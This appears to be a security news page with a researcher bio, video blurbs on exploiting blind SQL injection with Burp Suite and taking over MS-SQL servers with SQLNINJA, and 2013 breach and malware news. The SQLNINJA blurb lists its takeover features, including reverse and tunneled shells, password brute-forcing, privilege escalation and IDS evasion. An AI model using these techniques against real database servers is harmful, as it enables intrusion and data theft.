BIO: Rodrigo Rubira Branco (@BSDaemon) is the responsible for the Dissect || PE project, an automated malware analysis system available for security researchers to test new ideas and findings. In the past, he worked as Director of Vulnerability & Malware Research at Qualys, as Chief Security Research for Check Point where he released dozens of security vulnerabilities and was awarded by Adobe as one of the top contributors for vulnerabilities in 2011. He also worked as Senior Vulnerability Researcher for Coseinc and Staff Software Engineer in IBM. He is the organizer of H2HC (Hackers 2 Hackers Conference), the oldest security research conference in Latin America.

Using Burp to exploit a Blind SQL Injection

Alone

In this video you will learn how to exploit a web application using Burp Suite tool with Blind SQL Injection vulnerability. We are using Burp Suite for Blind SQLI because using Burp Suite we can our valuable time.

How to use SQLNINJA to takeover MS-SQL Database Servers

Alone

In this video you will learn how to exploit MS-SQL. This video is advanced for exploiting MS-SQL Database. For Exploiting a MS-SQL Database Hoody is using a tool called SQLNINJA . SQLNINJA is a very powerful SQLI exploitation tool. About SQLNINJA : The full documentation can be found in the tarball and also here, but here's a list of what the Ninja does: Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode) Data extraction, time-based or via a DNS tunnel Integration with Metasploit3, to obtain a graphical access to the remote DB server through a VNC server injection or just to upload Meterpreter Upload of executables using only normal HTTP requests (no FTP/TFTP needed), via vbscript or debug.exe Direct and reverse bindshell, both TCP and UDP DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames ICMP-tunneled shell, when no TCP/UDP ports are available for a direct/reverse shell but the DB can ping your box Bruteforce of 'sa' password (in 2 flavors: dictionary-based and incremental) Privilege escalation to sysadmin group if 'sa' password has been found Creation of a custom xp_cmdshell if the original one has been removed TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell Evasion techniques to confuse a few IDS/IPS/WAF Integration with churrasco.exe, to escalate privileges to SYSTEM on w2k3 via token kidnapping Support for CVE-2010-0232, to escalate the privileges of sqlservr.exe to SYSTEM

[News] McAfee finds sophisticated attacks targeting other 'critical sectors' of the economy

Financial services has been a favorite target for sophisticated attacks in the last few years, but cyber criminals are moving on to other "critical sectors of the economy," according to McAfee. In the security giant's fourth quarter threats report, researchers highlighted some of the new schemes being used in this regard and other high-profile attacks, including advanced persistent threats (APTs) such as Operation High Roller and Project Blitzkrieg. Both of these methods attack financial services infrastructures, with the former aimed at manufacturing and import/export firms in the United States and Latin America, while Blitzkrieg hits both consumers and their banks through illicit electronic fund transfers. Vincent Weafer, senior vice president of McAfee Labs, explained in the report why many of these cyber criminals are becoming more interested in government, manufacturing and commercial transaction infrastructure targets.

[News] Why encryption doesn't solve the data sovereignty debate

There is a long-standing argument that encrypting all data sent to the cloud could make the data sovereignty debate irrelevant, enabling Australian companies to make use of cheaper, offshore clouds. The basis of the argument is that data, once encrypted, is random and cannot be read, so the problem is shifted toward the issue of key management — which can be solved by ensuring that keys remain onshore. But security vendors Trend Micro and Sophos, and systems integrator CSC, have argued that encrypting everything isn't necessarily the answer for everyone, and that doing so would come at too high a cost. At a media briefing, Trend Micro vice president for Data Centre and Cloud Security Bill McGee stated that encryption brings about additional challenges that have flow-on effects in terms of scaling a cloud solution, and the financial implications that brings.

[News] Biometric USB password key worthy of 'Mission: Impossible'

I hate to use the term "sexy" to describe a gadget, but if the myIDkey isn't "sexy," at least it's "damn fine." It takes the concept of a USB drive that protects all your passwords and does it up right with voice-activated search, biometric fingerprint identification, and Bluetooth. Making a USB password protection device sound exciting? That's pretty hot. I'm not the only person who thinks myIDkey is worth a look. It just launched its Kickstarter project and already has pulled in more than $87,000 (and rising fast) toward its $150,000 goal. A $99 pledge gets you a myIDkey with two different protective sleeves. Like most other USB password keys, you can plug myIDkey into a computer and it will auto-complete your information into pertinent forms. You can also store documents and files on it like a regular USB drive. What's cooler, though, is the voice-search function. Say the name of your bank, for example, and the key will show the information on an OLED display. Not just anyone can talk to the key and get results, though. You first have to unlock it by swiping your finger.

[News] Apple patches the Java hole its own developers fell into - eventually

Shortly after admitting that its own techies got infected thanks to a Java hole, Apple has pushed out a Java update for the rest of us. Bit of a pity that the Fruity Ones didn't do this back at the beginning of February, when Oracle's emergency "pre-Patch-Tuesday" update came out to fix the hole that Apple is only now closing off. Apple therefore bumps its Java distribution from 1.6.0_37 to 1.6.0_41, leapfrogging OS X 10.7 and 10.8 users past 1.6.0_39 entirely (the even numbers weren't used for official releases). This re-aligns Apple's version with Oracle's own recent patch, which came out on 19 February 2013 as scheduled.

[News] Firefox 19 Fixes HTTPS Phishing Issue, Adds Built-In PDF Viewer

Mozilla has released Firefox 19, the latest version of its flagship browser, which includes not only fixes for a number of serious security vulnerabilities but also a built-in PDF viewer. The native PDF viewer in Firefox could help protect against some of the ongoing attacks that use vulnerabilities in Adobe Reader and other PDF readers as infection vectors. Attackers have been preying on Reader and Acrobat vulnerabilities for several years now, although the sandbox that Adobe added to Reader X and later versions has helped protect users against many exploits. Just last week, though, the first confirmed Reader sandbox escape exploit surfaced. Adobe patched that vulnerability on Tuesday. Mozilla officials said the inclusion of the built-in PDF viewer should make life a little easier for Firefox users when they encounter a PDF on a site.

[News] Apple, Facebook, Twitter hacks said to hail from Eastern Europe

While many security experts have been pointing the blame at China for the recent wave of cyberattacks on U.S. companies and newspapers, Bloomberg reports that some of the malware attacks actually may be coming from Eastern Europe. Investigators familiar with the matter told Bloomberg they believe a cybercriminal group based in either Russia or Eastern Europe is carrying out the high-level attacks to steal company secrets, research, and intellectual property, which could then be sold on the black market. Evidence that the attacks may be coming from Eastern Europe is the type of malware being used by the hackers, which is more commonly used by cybercriminals than by government spying. Also, investigators have tracked at least one server being used by the hackers to a Ukrainian hosting company.

[News] Botnet master abuses Facebook for pocket money, researchers reveal

A Chinese hacker's main job may well be running a botnet of malware-clotted zombie PCs, but there's always time left in the day for selling fake Likes, apparently. It is not every day that remorseful confessions over lapsed adherence to the Five Precepts of Buddhism help researchers identify a hacker. In early 2012, hacker Zhang Changhe admitted, on Chinese social network Kaixin001, to breaking all Five Precepts of Buddhism. Sexual misconduct, lying, and drinking aside, Zhang Changhe wrote that he also stole "continuously and shamelessly," though he hoped that he could stop stealing in the future. Turns out that Zhang Changhe runs a botnet. (Perhaps that is what he was alluding to when he spoke of stealing "continuously and shamelessly"?) Two security researchers, Dell SecureWorks's Joe Stewart and a 33-year-old blogger called "Cyb3rsleuth", claim that Zhang Changhe also reportedly works for the Chinese army and teaches at PLA Information Engineering University, a center for electronic intelligence, comparable to the US's National Security Agency's university.

[News] Apple Breached by Facebook Hackers Using Java Exploit

Apple is the latest major American company to enter the security confessional and disclose it has been breached. The company told Reuters today it was attacked by the same crew that hit Facebook, which disclosed its breach last Friday, and that like the social media giant, no data had been stolen. In both cases, a Java zero-day vulnerability had been exploited by attackers, in this case, to gain access to Apple machines. Reuters is reporting that the same attack was used against other Mac computers at hundreds of companies, including some in the defense industrial base. "Apple has identified malware which infected a limited number of Mac systems through a vulnerability in the Java plug-in for browsers. The malware was employed in an attack against Apple and other companies, and was spread through a website for software developers," said Reuters, quoting a statement from Apple. "We identified a small number of systems within Apple that were infected and isolated them from our network. There is no evidence that any data left Apple.”

[News] New Mac malware opens secure reverse shell

A new backdoor Trojan for OS X is making the rounds, attempting to set up a secure connection for a remote hacker to connect through and grab private information. The malware, dubbed "Pintsized" by Intego, is suspected of using a modified implementation of OpenSSH to set up a reverse shell that creates a secure connection to a remote server. The use of an encrypted connection makes it more difficult to detect and trace, especially since it uses the common SSH protocol. In addition, the malware attempts to hide itself by disguising its files to look like components of the OS X printing system, specifically the following: com.apple.cocoa.plist cupsd (Mach-O binary) com.apple.cupsd.plist com.apple.cups.plist com.apple.env.plist

[News] US: China hacking 'repeatedly raised at highest level'

The US says it has repeatedly raised concerns with Beijing about cyber theft, as a report linked a hacking group with a Chinese military unit. While not commenting directly on the report, a White House spokesman called cyber theft a "major challenge" in the national security arena. The report identified a Shanghai high-rise used by the military as the likely home of a prolific hacking group. China's Defence Ministry has denied any role in hacking. Cyber sabotage, including hacking, was banned, China Daily quoted the ministry as saying, sentiments echoed by Foreign Ministry spokesman Hong Lei.